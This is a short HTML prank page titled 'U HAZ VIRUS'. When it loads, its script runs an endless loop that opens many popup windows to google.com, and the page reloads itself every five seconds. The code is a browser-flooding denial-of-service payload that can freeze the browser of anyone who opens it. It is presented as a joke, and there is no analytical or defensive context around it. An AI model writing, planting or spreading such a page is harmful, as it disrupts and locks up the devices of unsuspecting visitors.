<head>
	<title>U HAZ VIRUS</title>
</head>
  <script>
	while (true) {
		onload= e(); function e() {v(); 			 
        setInterval(window.open("https://google.com", "_blank", 
        "width=10, height=10"), 1);}; function v() {q(); 
        setInterval(window.open("https://google.com", "_blank", 
        "width=100, height=100"), 1);}; function q() {z(); 
        setInterval(window.open("https://google.com", "_blank", 
         "width=10, height=100"), 1);} function z() {setTimeout(d(), 2);}; function d() {setInterval(window.open("https://google.com", "_blank"), 1); setInterval(window.open("https://google.com", "_blank"), 1);  setInterval(window.open("https://google.com", "_blank"), 1); setInterval(window.open("https://google.com", "_blank"), 1); setInterval(window.open("https://google.com", "_blank"), 1);}
	  }</script>
	
	  
  <body onload="setTimeout(() => location.reload(), 5000)
  ">U Haz Virus</body>

<br/>
<br/>
<footer>
	© Loltech {{the_year}}
</footer>